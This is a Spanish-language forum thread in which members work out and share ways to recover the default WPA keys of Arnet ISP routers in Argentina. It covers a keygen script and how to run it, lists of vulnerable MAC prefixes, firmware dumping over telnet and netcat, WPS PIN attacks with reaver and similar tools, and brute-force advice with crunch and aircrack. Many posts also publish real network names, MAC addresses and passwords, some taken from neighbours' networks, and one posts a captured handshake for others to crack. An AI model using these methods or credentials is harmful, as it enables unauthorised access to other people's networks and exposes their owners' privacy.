Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 12 de Enero de 2015, 12:08:05 PM
yo tengo una pero es EC:CB:30 de Huawei Technologies Co., Ltd
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 12 de Enero de 2015, 12:26:37 PM
Otra: 78:6A:89 de Huawei Technologies Co., Ltd . SSID: WiFi-Arnet-ndds Seguridad: WPA-PSK-CCMP
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 12 de Enero de 2015, 07:19:28 PM
He actualizado algo en el script. Deberia estar ya todo arreglado.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 12 de Enero de 2015, 08:57:45 PM
You are not allowed to view links. Register or Login
He actualizado algo en el script. Deberia estar ya todo arreglado.

Versión para Windows 1.2 = http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.2.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.2.rar)

Edite el primer mensaje del hilo con datos de interés.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 12 de Enero de 2015, 11:20:09 PM
Vale aclarar que para sacar la clave con el script necesitamos si o si el BSSID.
Si intentamos comprobar la clave usando la MAC que figura en la etiqueta del router nos va a dar la clave equivocada, ya que la BSSID = MAC de la etiqueta + 1.

Saludos!  :D
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 13 de Enero de 2015, 12:25:33 PM
@Nicash: si eso es porque la MAC Address que figura es de una de la Ethers Cableadas, de igual manera ojo con que MAC tiene porque cada Ether tiene una MAC Address diferente, por ende son 5 + 1 Inalambrica.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 13 de Enero de 2015, 01:20:27 PM
Muy guenas a tod@s !!

@D3M0N, la nueva versión del app WPAmagickey se encuentra desde el día de reyes en las tiendas Amazon, Opera, SlideMe, ... en el blog de la aplicación http://WPAmagickey.blogspot.com teneis los enlaces oportunos.

Tambien en mi blog personal http://Buckynet.blogspot.com
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Enero de 2015, 06:10:21 AM
@buckynet: el script es gratuito... tu app no... vivir a cuestas de otros.  :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 14 de Enero de 2015, 09:34:19 AM
@buckynet: anímate y hace una free solo para arnet  ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 14 de Enero de 2015, 10:58:15 AM
Muy guenas @D3M0N !!

Como supongo que no sabes, llevamos ya bastante tiempo "divertiendonos" con los routers de los ISP europeos junto a mas colegas. Si crees que tus palabras me ofenden personalmente, estas muy equivocado, pero es algo normal y que entiendo desde tu IGNORANCIA sobre este asunto. Te doy una pista, la fecha de compilación del apk de la nueva versión de donación.

Como espero que entiendas, los usuarios de la versión de donación son los primeros en recibir la nueva versión con las actualizaciones y/o modificaciones oportunas, en este caso concreto el añadido de las redes WiFi-Arnet.

La nueva versión de donación ha sido probada por algunos usuarios que están en Argentina, y actualmente están en contacto con nosotros para poder mejorar el calculo del algoritmo de ADB Pirelli del ISP Arnet, y algunas cosas mas. Gracias a tod@s, y nos vemos en la Ekoparty.

La nueva versión gratuita de la app WPAmagickey, con el añadido de las redes WiFi-Arnet, saldrá cuando decidamos y/o queramos. Ahora mismo, los betatesters están haciendo "labores de campo".

Menos charlas y mas trabajar, ya teneis publico un script en python, ahora queremos ver esos fallos "especiales" en el calculo del algoritmo, que pueden existir con los routers de ADB Pirelli de Arnet.

@GSN, si quieres ser betatester, ponte en contacto.

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 14 de Enero de 2015, 11:20:49 PM
como hago un dumpeo de los firmwares de mis modems?
Aún tengo los 3 que postié en imágenes algunas páginas atrás?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 14 de Enero de 2015, 11:21:19 PM
Hola, me vengo leyendo todo el hilo desde el principio. Arranco agradeciendo el tiempo y esfuerzo de todos.
Yo soy muy lento en estos temas, pero me interesa bastante aprender un poco más... Alguien me explica como hago para probar con windows ese programa, lo bajé descomprimí y al abrir el ejecutable se cierra al instante. Gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 14 de Enero de 2015, 11:23:52 PM
Tenes que entrar con cmd en la carpeta donde esta y hace:

wifiarnet.exe -b (Mac Address)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 15 de Enero de 2015, 01:23:53 AM
You are not allowed to view links. Register or Login
como hago un dumpeo de los firmwares de mis modems?
Aún tengo los 3 que postié en imágenes algunas páginas atrás?

por ahi @2kW79@32WEYS: te va poder guiar sobre como extraer esa info de los modems
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 15 de Enero de 2015, 09:47:24 AM
You are not allowed to view links. Register or Login
por ahi @2kW79@32WEYS: te va poder guiar sobre como extraer esa info de los modems

Lo explico en http://arg-wireless.com.ar/index.php?topic=1006.msg6798#msg6798
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 15 de Enero de 2015, 03:27:16 PM
@badder: Estoy interesado en esos 2 routers. Necesitamos ls firmwares. Si miras el codigo que publique, veras un enlace que dice como fernando3k dumpeo varios routers arnet. Sino googlealo. O como dicen por ahi, leete las ultimas 3 paginas dsd ahora hacia atras. Veras la informacion que necesitas.

Lo mas viable es si tienes telnet y acceso a root. Mirar si tienes en /usr/bin or /usr/sbin netcat en tu sistema(or simplemente nc). Luego bajarte los bloques de firmware.

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 15 de Enero de 2015, 04:35:25 PM
Acá encontré masomenos un tuto http://www.adslzone.net/postt8030.html (http://www.adslzone.net/postt8030.html) y casualidad salio este vídeo:

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 15 de Enero de 2015, 06:37:44 PM
You are not allowed to view links. Register or Login
Tenes que entrar con cmd en la carpeta donde esta y hace:

wifiarnet.exe -b (Mac Address)

Gracias, ahora pude, pero no me dio buen resultado.

Yo probé con un wifi - arnet - XXXX
MAC:08:7a:XX:XX:XX:XX
Y no me dió la clave correcta...
Es el router de un amigo que le saqué una foto a la parte de atras, y la clave esta escrita ahí y es la de por defecto, sin modificar.

Algo que haga mal?? Uso windows...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 15 de Enero de 2015, 06:42:49 PM
Fíjate que @Nicash había nombrado lo de las MAC's: http://arg-wireless.com.ar/index.php?topic=1006.msg6779#msg6779 bájate esta version: http://arg-wireless.com.ar/index.php?topic=1006.msg6785#msg6785 que es la que tiene las dos WPA posibles. Y chequea que este en la lista con el comando -l
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 15 de Enero de 2015, 06:48:42 PM
Muy guenas a tod@s !!

@elpibemc, pasame los datos por privado que lo verifico. Prueba con la opcion -a para generar las claves.

@GSN, gracias. Are you ready for R&R ??

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 19 de Enero de 2015, 09:07:49 PM
Actualice el primer mensaje del hilo (http://arg-wireless.com.ar/index.php?topic=1006.msg4227#msg4227) indicando nuevas MAC Address de routers WiFi-Arnet-XXXX
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 23 de Enero de 2015, 09:02:33 AM
Quiero mencionar que hace más o menos una semana con la ayuda de 2kW79@32WEYS subí los firmwares y algunos ficheros extras que me solicitó sobre los modems que postié en imágenes páginas atrás.
Incluso tiene hasta las MAC wireless (no ethernet) de c/u de ellos.

Solo resta esperar novedades en algún momento.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 23 de Enero de 2015, 05:41:27 PM
Puedes subir si quieres los firmwares a donde veas bajo tu responsabilidad. Asi cualquiera puede intentarlo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 24 de Enero de 2015, 09:57:29 PM
hola alguien probo el script "geminisauditor"?? http://foro.seguridadwireless.net/live-wifislax/geminisauditor-(wep-wpa-wps)-todo-en-uno/ (http://foro.seguridadwireless.net/live-wifislax/geminisauditor-(wep-wpa-wps)-todo-en-uno/) porque dentro de la lista de redes soportadas en este script http://downloadwireless.net/scripts-live/patrones_conocidos.txt (http://downloadwireless.net/scripts-live/patrones_conocidos.txt) pude ver las redes Wifi-Arnet-????
¿es lo mismo q WPAmagickey?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 26 de Enero de 2015, 12:43:36 AM
@diogenes: si te fijas la actualización es del día de ayer... seguramente lo han agregado.  :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 26 de Enero de 2015, 07:02:44 AM
Muy guenas a tod@s !!

Añadido en la Versión 20150125 los siguientes patrones_conocidos para WiFi-Arnet. Para que funcione el último script de wifiarnet.py dentro de Wifislax, y puedo ser lanzado desde geminisauditor o el resto de scripts que existen.  ;D

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 31 de Enero de 2015, 10:12:14 PM
Muy guenas a tod@s !!

WPAmagickey. WPA Keygen Audit. Version 1.6
WPAmagickey. WPA Keygen Audit Free. Version 1.5


* Añadido ADB Pirelli 'WiFi-Arnet-XXXX' del ISP Arnet Telecom Argentina con BSSID inicial '00:08:27:', '00:13:C8:', '00:17:C2:', '00:19:3E:', '00:1C:A2:', '00:1D:8B:', '00:22:33:', '00:8C:54:', '30:39:F2:', '74:88:8B:', '84:26:15:', 'A4:52:6F:', 'A4:5D:A1:', 'D0:D4:12:', 'D4:D1:84:', 'DC:0B:1A:', 'F0:84:2F:' o con el ESSID modificado.

http://WPAmagickey.blogspot.com



Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 21 de Febrero de 2015, 03:13:51 PM
You are not allowed to view links. Register or Login
Muy guenas a tod@s !!

WPAmagickey. WPA Keygen Audit. Version 1.6
WPAmagickey. WPA Keygen Audit Free. Version 1.5


* Añadido ADB Pirelli 'WiFi-Arnet-XXXX' del ISP Arnet Telecom Argentina con BSSID inicial '00:08:27:', '00:13:C8:', '00:17:C2:', '00:19:3E:', '00:1C:A2:', '00:1D:8B:', '00:22:33:', '00:8C:54:', '30:39:F2:', '74:88:8B:', '84:26:15:', 'A4:52:6F:', 'A4:5D:A1:', 'D0:D4:12:', 'D4:D1:84:', 'DC:0B:1A:', 'F0:84:2F:' o con el ESSID modificado.

http://WPAmagickey.blogspot.com



Un saludo.

PD: Como siempre, en algo, habre metido la pata.
A ver si entiendo... Lo único que tenemos de Wifi-arnet-XXXX es cuando son de Pirelli, otra marca de routers no funciona?? o estoy errado? Perdonen mi ignorancia, estoy aprendiendo, saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 01 de Marzo de 2015, 01:04:57 PM
@elpibemc: si es solo pirelli. En el primer post del hilo tenes toda la info.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: FiWi en 09 de Marzo de 2015, 10:00:29 PM
Hice un resumen de los datos que se fueron aportando hasta el momento:

(http://s28.postimg.org/7byl2ve5p/Arnet.png) (http://postimage.org/)

Descargar en formato PDF (http://docdroid.net/tymw)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: FiWi en 19 de Marzo de 2015, 02:25:20 PM
Hoy me topé con una contraseña de arnet de un router ADB A4001N que incluye un símbolo, algo que no habia visto hasta el momento. Incluye el símbolo de diámetro (ALT + 157).

Les dejo imagen:
(http://i.imgur.com/T5FdbcL.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 26 de Marzo de 2015, 08:54:17 AM
You are not allowed to view links. Register or Login
Hoy me topé con una contraseña de arnet de un router ADB A4001N que incluye un símbolo, algo que no habia visto hasta el momento. Incluye el símbolo de diámetro (ALT + 157).

Les dejo imagen:
(http://i.imgur.com/T5FdbcL.jpg)

En realidad es el número 0 (cero). Lo deben imprimir con ese caracter para que no se confunda con la letra O. Te puedo confirmar porque tengo un router en mis manos que también lo tiene.

Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: gonzurro en 27 de Abril de 2015, 01:18:31 PM
Hola el algoritmo me da el password erroneo alguien sabe porque la mac es A4-5D-A1-63-23-F2
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 28 de Abril de 2015, 11:09:20 PM
Quizás cambiaron la contraseña o quizás esa MAC no esta soportada. Probaste con todas las versiones del script? yo por el momento estoy plagado de ZTE Corporation, ZyXEL Communications Corporation..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: gonzurro en 29 de Abril de 2015, 06:24:25 PM
si probe con los 2 scripts, uno da un pw y el otro 2, de todas formas ninguno funca, este es un a ADB DA 2210, tmb probe con el WPA magic 1.5 y nada..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: santypk4 en 10 de Mayo de 2015, 07:56:59 PM
Quiero aportar a la lista

Red::Contraseña se respetan mayusculas y minisculas


wifi-arnet-4d41 :: 4FD4A11E29
wifi-arnet-7351 :: 3yva5q66yr
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: piraculis en 27 de Mayo de 2015, 01:36:49 PM
Hola, les quería agradecer por la info que han subido. Dejo mi aporte:

ESSID: WiFi-Arnet-3333
BSSID: F0:84:2F:6F:9B:02         
WPA: j1xdcacbg0

ESSID: WiFi-Arnet-8343   
BSSID: A4:52:6F:0A:2E:E4         
WPA: ueg3q0z8s0

ESSID: WiFi-Arnet-FE03   
BSSID: 84:26:15:E3:FE:04         
WPA: fekoy9nwdl
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 16 de Junio de 2015, 11:47:21 AM
Hola, tengo esto:

Wifi-Arnet_XXXX
28285d55b8c0
la clave que me da wifiarnet-1.2 es: p91cxcdjvw

Es correcto esto?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Junio de 2015, 09:06:11 PM
You are not allowed to view links. Register or Login: si te conecta si, si no te conecta no.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 17 de Junio de 2015, 07:49:26 PM
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login: si te conecta si, si no te conecta no.
Me refiero a que no se si utilizé bien el programa. para que alguien me confirme si le da la misma clave
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: cajosar en 11 de Julio de 2015, 05:31:59 PM
You are not allowed to view links. Register or Login
Continuo aportando mas datos que encontré en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-1841
WLAN Security (WPA-PSK): 1852852963
MAC: B4:B3:62:6D:E0.1A - B4:B3:62:6D:E0:20

http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM (http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM)



(http://bimg2.mlstatic.com/mar-del-plata-modem-router-wi-fi-usb-zte_MLA-F-4339857922_052013.jpg)

Lamentablemente la siguiente imagen tiene una pobre definición, los datos parecen ser:

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-4703
WLAN Security (WPA-PSK): 5040372nl5
MAC: B4:74:2A:20:5D:FF - B4:74:2A:20:BE:05

http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM (http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM)

(http://img1.mlstatic.com/modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso_MLA-O-4146127433_042013.jpg)

Saludos.

buenas en venezuela la mac es 70:9F:2D  y la clave es un digito numerico de 14 cifras sin letras, si alguien sabe donde generar un diccionario de 14 digitos estaria fino jeje gracias, lo maxico que e conseguido es hasta 10 digitos, saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: marcos2612 en 16 de Julio de 2015, 04:41:55 AM
You are not allowed to view links. Register or Login
buenas en venezuela la mac es 70:9F:2D  y la clave es un digito numerico de 14 cifras sin letras, si alguien sabe donde generar un diccionario de 14 digitos estaria fino jeje gracias, lo maxico que e conseguido es hasta 10 digitos, saludos

consejo ni te conviene generar diccionarios, trabaja con crunch y reventalas con pyryt o aircrack (pero te vas a volver viejo, búscate algún patrón (aca por ej las claves de fibertel tienen 10 digitos, empiezan con 014 o 004) y por si eso fuera todo los números siguientes corresponden al num de documento sin el ultimo dígito, como veras, pisteaste como campeon asique ya sabes metele paciencia pero sobe todo cerebro que la reventas (ayuda mucho saber el modem, y la version por ahi la reventas con el pin generico sin tanto laburo)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 18 de Julio de 2015, 06:35:11 PM
Mi granito de arena:

Equipo zyxel P-660HNU-T1
ESSID: WiFi-Arnet-3u24
MAC: A0:E4:CB:47:0C:B4
PIN: 46563088
WLAN Security (WPA-PSK): qUsA93z74PA97

Extraído en 1 minuto con Geminis Auditor.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 05 de Agosto de 2015, 09:34:03 AM
Otro que conseguí.

Equipo Zyxel P-660HNU-T1 v2
ESSID: WiFi-Arnet-t189
MAC: A0:E4:CB:4B:XX:XX
WLAN Security (WPA-PSK): 7WcYXAAXAbHaA
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 16 de Agosto de 2015, 06:58:52 PM
Vamos con más.  8)

ESSID: WiFi-Arnet-f168
MAC: A0:E4:CB:53:7D:AC
WLAN Security (WPA-PSK): ulpwwrk7oCTjv

ESSID: WiFi-Arnet-gra4
MAC: A0:E4:CB:52:69:9C
WLAN Security (WPA-PSK): mWHb9JKW3RbKW
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 16 de Agosto de 2015, 08:46:12 PM
algun firmware nuevo con el que pasar un rato?

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Agosto de 2015, 09:43:29 PM
Algo interesante que encontre:

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fertxt en 13 de Septiembre de 2015, 04:02:15 PM
Revisando un router con el q me encontre modelo vmg 1312-b10b me di con que tenia cifrado wep contraseña 12345, y wps desactivado pero con un pin wps o distintos segun momentos, 87020397, ese es el numero de pin que tiene ahora pero en otro momento tuvo otro, mi pregunta es, sera que atraves de datos que pueda suministrar de como van cambiando los pines se pueda sacar el algorritmo segun el cual se genera?
Estos routers son los ZyXEL VMG 1312-b10b y con reaver se bloquea el wps cada 3 intentos y se bloquea por bastante tiempo, minimo 2 dias.
Si alguien tiene algun dato sobre estos routers se lo agradecere, sobre todo el pin ya que estoy rodeado de esos routers y tuve la suerte de encontrarme solo con uno de cifrado WEP, todos los demas wpa2 con wps activo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: LisT en 24 de Septiembre de 2015, 04:44:33 PM
Buenas!!
Leí todo el thread, muchas gracias por sus aportes, se valora su duro trabajo.
Estoy intentando descifrar una red y no tuve exitos hasta el momento.

-ESSID: WiFi-Arnet-1238
-BSSID: a4:5d:a1:81:12:39

Como comienza en a4:5d:a1:XX:XX:XX (está en el listado del script) probé con las generadas por pirelli.py, incluso con el parámetro -a , pero ninguna funcionó
El WPS está desactivado.

Podrian darme una mano con esto? Se los agradezco !!

Dejo adjunto el archivo con el Handshake
http://www.mediafire.com/download/85v6wicqc889ui4/arnet1238.cap (http://www.mediafire.com/download/85v6wicqc889ui4/arnet1238.cap)

Saludos! =)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fitap en 03 de Noviembre de 2015, 11:29:49 PM
Hola a todos, tremendo trabajo se llevaron a cabo, he leido casi todo el hilo y les comento que tengo dos 4001N y las MAC estan dentro del listado pero la clave que me arroja es incorrecta cuando quiero conectarme al modem, hice la modificacion del script de sacarle +inc pero me sigue dando la misma clave que sino le saco esa variable.

Algo estoy haciendo mal?

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 15 de Noviembre de 2015, 01:38:26 PM
You are not allowed to view links. Register or Login los generadores o keygens no son 100% seguros.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fitap en 22 de Noviembre de 2015, 03:01:29 PM
Nose que ha pasado ahora, no me funciona ningun script, me arroja este error



File "./wifiarnet.py", line 92
    print "[+] SHA256  : %s" % sha256.hexdigest()
                           ^
SyntaxError: invalid syntax




Saludos.
p.d. alguno con conocimientos de ingenieria inversa para liberar las apk?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 11 de Enero de 2016, 04:49:54 PM
Voy a poner nuevamente arnet.
Me ofrecieron 5 mil minutos local libres y VDSL 10 mb/3 mb a 150 pesos. Final y sin cambios me prometieron estos gansos de telecom.
Apenas tenga el modem saco pic.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2016, 08:42:02 PM
You are not allowed to view links. Register or Login imposible a ese precio, alguna trampa tiene la letra chiquita.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 14 de Enero de 2016, 04:49:01 PM
Si, posta, es VDSL.
Me llegó el modem, instalo filtros, pongo todo y me encuentro con que no tengo la línea digitalizada, por lo tanto, cero sincronización.

Cuando el lunes me vendieron el servicio me garantizó el guaso una digitalización en 10 minutos mientras hablaba conmigo. Me llega hoy jueves y tengo el VDSL titileando.
Levanté el tubo, llamé al 112 y di de baja el servicio antes de siquiera poder usarlo. Que la chupen.
Como decía el mamerto de cutzarida, corta la bocha.

Acá va la foto del modem de arnet marca pinchil@ atomica.

ESSID: WiFi-Arnet-8873
MAC: 4C:09:D4:FA:87:02
WLAN Security (WPA-PSK): hm8t3k2x45

http://www.hapshack.com/images/6f3Od.jpg

(http://i.imgur.com/Fyc7Lbo.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Enero de 2016, 05:58:30 PM
You are not allowed to view links. Register or Login te dije! jajaja
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: tizzi en 04 de Febrero de 2016, 02:51:55 PM
Buenas, quería compartirles esta herramienta que utilice para sacar las clave de los router arnet que increiblemente vienen con el pin WPS activado.

En menos de 5 minutos ya estaba conectado, luego lo unico que deben hacer es ir a las propiedades de la red, en la pestaña seguridad, mostrar caracteres y tendran la clave wpa para que utilicen en otro dispositivo.

Intente con un router tp-link y este se bloqueo luego de un rato.

No recuerdo si ya lo han publicado pero dejo el enlace a youtube



Logre conectarme a 2 routers


name:WiFi-Arnet-****
clave: N9WTWC3J3NCF9
MAC: A0:E4:CB: - ZyXEL Communications Corporation

name:WiFi-Arnet-****
clave: (los nombres de dos personas, no era por defecto)
MAC: A0:E4:CB: - ZyXEL Communications Corporation
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 04 de Febrero de 2016, 08:40:20 PM
You are not allowed to view links. Register or Login interezante, igual dicha herramienta es mas lenta que reaver y no todas las redes arnet tienen wps.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 08 de Febrero de 2016, 07:46:38 PM
You are not allowed to view links. Register or Login
Buenas, quería compartirles esta herramienta que utilice para sacar las clave de los router arnet que increiblemente vienen con el pin WPS activado.

En menos de 5 minutos ya estaba conectado, luego lo unico que deben hacer es ir a las propiedades de la red, en la pestaña seguridad, mostrar caracteres y tendran la clave wpa para que utilicen en otro dispositivo.

Intente con un router tp-link y este se bloqueo luego de un rato.

No recuerdo si ya lo han publicado pero dejo el enlace a youtube



Logre conectarme a 2 routers


name:WiFi-Arnet-****
clave: N9WTWC3J3NCF9
MAC: A0:E4:CB: - ZyXEL Communications Corporation

name:WiFi-Arnet-****
clave: (los nombres de dos personas, no era por defecto)
MAC: A0:E4:CB: - ZyXEL Communications Corporation
Lo acabo de probar y no me funciona, se queda el Jumpstar intentando e intentando y luego dice que no puede... ¿Por qué será?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: clauslack en 09 de Febrero de 2016, 02:49:49 PM
Hola, excelente foro !!

Estos son los datos de mi router de Arnet, llegado en 01/2016 (Córdoba)
Arcadyan VR7516QW
SSID: WiFi-Arnet-zrkd
MAC: 5C DC 96 27 2D 88
Clave: udvxaeda4s

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: clauslack en 09 de Febrero de 2016, 08:10:55 PM
Aclaro, atras del router la MAC dice
5C DC 96 27 2D 88
pero cuando escaneo las redes en realidad es
54 DC 96 27 2D 88

Los de Arnet le erraron a la impresión del papel.



Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: tizzi en 15 de Febrero de 2016, 05:36:56 PM
You are not allowed to view links. Register or Login
Lo acabo de probar y no me funciona, se queda el Jumpstar intentando e intentando y luego dice que no puede... ¿Por qué será?

Lo mas probable es que se te haya bloqueado el router, te comento que yo recien lo estoy experimentando al programa ese y como me dio resultado lo publique, me paso con otra red arnet lo que vos decis pero tenía muy mala señal asi que pense fue eso.

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Febrero de 2016, 12:03:31 AM
el Jumpstar es igual que reaver la única diferencia es que es manual automatizado, básicamente era un programa para conectarte por qss o wps que lo automatizaron para hacer ataques..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 16 de Febrero de 2016, 05:17:54 PM
You are not allowed to view links. Register or Login
Lo mas probable es que se te haya bloqueado el router, te comento que yo recien lo estoy experimentando al programa ese y como me dio resultado lo publique, me paso con otra red arnet lo que vos decis pero tenía muy mala señal asi que pense fue eso.
A ver si hago algo mal... Lo primero que hago es ponerla en wps y scanear... Me salen muchas redes que no son wps (O eso es lo que yo creo) (¿Las wps son las que hay que apretar un boton en el router para conectarse o algo así, no?)...

La que me interesa si es wps seguro, es la que está marcada en la imagen... Después le doy a wpswin que es el segundo paso y me da este error... lo probé con todas las redes que me salen...

De todos modos copié el pin y lo pegué en Jumpstart y se queda como 10 minutos y al final nada... ni Pass ni nada...  :(
(http://i67.tinypic.com/10hizph.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 17 de Febrero de 2016, 12:05:36 AM
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 17 de Febrero de 2016, 08:57:35 AM
You are not allowed to view links. Register or Login
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.
Este es la CAP, ya le pasé de 8 números, más que eso no me da la máquina...
https://mega.nz/#!aRZQFArA!9Vcp8aqlwSnt2_ntmzLygnj8N4Tz5HvTX6hLQnEZY20
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 23 de Marzo de 2016, 03:17:38 PM
Me encontré con una nueva red wireless, asumo debe ser VDSL.
Lo curioso es el nombre de la red/mac

WiFi-Arnet-BD33B7
30:91:8F:BD:33:B7
WPA2-CCMP


Viene con WPS enabled pero le tiré con todas las tools de WifiSlax y no tuve suerte.
Fabricante Technicolor, por lo que pienso podría ser éste:
Technicolor TG588 (http://arnetonline.arnet.com.ar/Modem.htm)

Alguien tiene info al respecto?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elhereje en 01 de Abril de 2016, 07:01:14 PM
Hola, estoy en la misma

WiFi-Arnet-XXXXXX
C4:EA:1D:XX:XX:XX
WPA2

Es nueva en mi depto, se ve que tiene un formato nuevo
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: dipa en 01 de Abril de 2016, 08:00:36 PM
Hola

Yo pude obtener todas las redes que probé tipo "WiFi-Arnet-XXXX" inmediatamente. Las instrucciones para hacerlo están aquí: http://www.hackingdream.net/2015/05/hack-wifi-wpa-wpa2-wps-in-windows-in-2.html (http://www.hackingdream.net/2015/05/hack-wifi-wpa-wpa2-wps-in-windows-in-2.html). Por una cuestión de precaución en lo personal decidí no utilizar los links de descarga de ese post (que no conozco de donde sale) y busqué en google cada archivo necesario para bajar.

Espero que les sirva!

Dipa
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 02 de Abril de 2016, 04:07:01 PM
Hola Dipa, voy a probar eso en windows pero estamos hablando de los nuevos modems VDSL que empezó a usar arnet.
Hasta ahora vi uno solo pero no es vulnerable a los ataques WPS incluídos en WifiSlax.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: dipa en 02 de Abril de 2016, 11:47:36 PM
Ah, no leí esa parte. Los que yo conseguí son todos ADSL modelo P-660HNU-TIv2.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 07 de Abril de 2016, 08:31:44 PM
You are not allowed to view links. Register or Login
WiFi-Arnet-BD33B7
30:91:8F:BD:33:B7
WPA2-CCMP

Mi sospecha sobre éstos tecnicolor es que en sus WPA Key usan nros del 0 al 9 y letras mayúsculas de la A a la F en 9 a 10 caracteres.
Supongo que hacer un diccionario a esa medida y correrlo será titánico no? ???
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Migue27 en 07 de Abril de 2016, 08:46:07 PM
Imagino que "Titaniquísimo" jajaja
